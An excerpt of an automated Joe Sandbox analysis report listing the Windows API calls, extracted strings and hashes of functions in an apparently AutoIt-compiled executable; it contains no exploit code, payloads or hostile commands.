                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                    • API String ID: 169749273-3863044002
                    • Opcode ID: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                    • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                    • Opcode Fuzzy Hash: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                    • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                    • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                    • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                    • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                    APIs
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                    • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                    • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                    • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                    • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                    • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                    • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                    • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                    • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                    • GetCursorInfo.USER32(?), ref: 004750C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Cursor$Load$Info
                    • String ID:
                    • API String ID: 2577412497-0
                    • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                    • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                    • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                    • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                    APIs
                    • _memset.LIBCMT ref: 0048A259
                    • DestroyWindow.USER32(?,?), ref: 0048A2D3
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                    • DestroyWindow.USER32(00000000), ref: 0048A3A4
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                    • GetDesktopWindow.USER32 ref: 0048A40D
                    • GetWindowRect.USER32(00000000), ref: 0048A414
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                    • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                    • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                    • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00484424
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                    • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                    • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                    • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                    • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                    • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                      • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                    • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                    • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                    • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                    • GetDriveTypeW.KERNEL32 ref: 0046A418
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 437170107335614e440451c14e1bb7fb1cb2a37dfa70594022b46967140f2eef
                    • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                    • Opcode Fuzzy Hash: 437170107335614e440451c14e1bb7fb1cb2a37dfa70594022b46967140f2eef
                    • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                    • GetFocus.USER32 ref: 0048C20C
                    • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                    • _memset.LIBCMT ref: 0048C342
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                    • GetMenuItemCount.USER32(?), ref: 0048C38D
                    • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                    • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                    • Opcode Fuzzy Hash: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
                    • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                    APIs
                    • GetDC.USER32(00000000), ref: 0047738F
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                    • CreateCompatibleDC.GDI32(?), ref: 004773A7
                    • SelectObject.GDI32(00000000,?), ref: 004773B4
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                    • SelectObject.GDI32(00000006,?), ref: 00477470
                    • DeleteObject.GDI32(?), ref: 00477479
                    • DeleteDC.GDI32(00000006), ref: 00477480
                    • ReleaseDC.USER32(00000000,?), ref: 0047748B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                    • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                    • Opcode Fuzzy Hash: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                    • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                    APIs
                      • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                      • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                      • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 7e8133b54eda1aed7a4270345f082cd699d1112609d47d64313adbce1b1bcd58
                    • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                    • Opcode Fuzzy Hash: 7e8133b54eda1aed7a4270345f082cd699d1112609d47d64313adbce1b1bcd58
                    • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                    APIs
                    • _memset.LIBCMT ref: 00462D50
                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                    • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                    • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                    • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                    • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                    • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                    • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                    • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                    • GetCursorPos.USER32(?), ref: 00462F56
                    • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                    • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 3993528054-0
                    • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                    • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                    • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                    • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004788D7
                    • CoInitialize.OLE32(00000000), ref: 00478904
                    • CoUninitialize.OLE32 ref: 0047890E
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                    • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                    • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                    • VariantClear.OLEAUT32(?), ref: 00478C35
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,I
                    • API String ID: 2395222682-4163367948
                    • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                    • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                    • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                    • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                    APIs
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • _memset.LIBCMT ref: 0045786B
                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                    • API String ID: 1411258926-22481851
                    • Opcode ID: 4434111d8f3e630182491e914928aa6b888319ba381408191320ad454d3f649a
                    • Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
                    • Opcode Fuzzy Hash: 4434111d8f3e630182491e914928aa6b888319ba381408191320ad454d3f649a
                    • Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
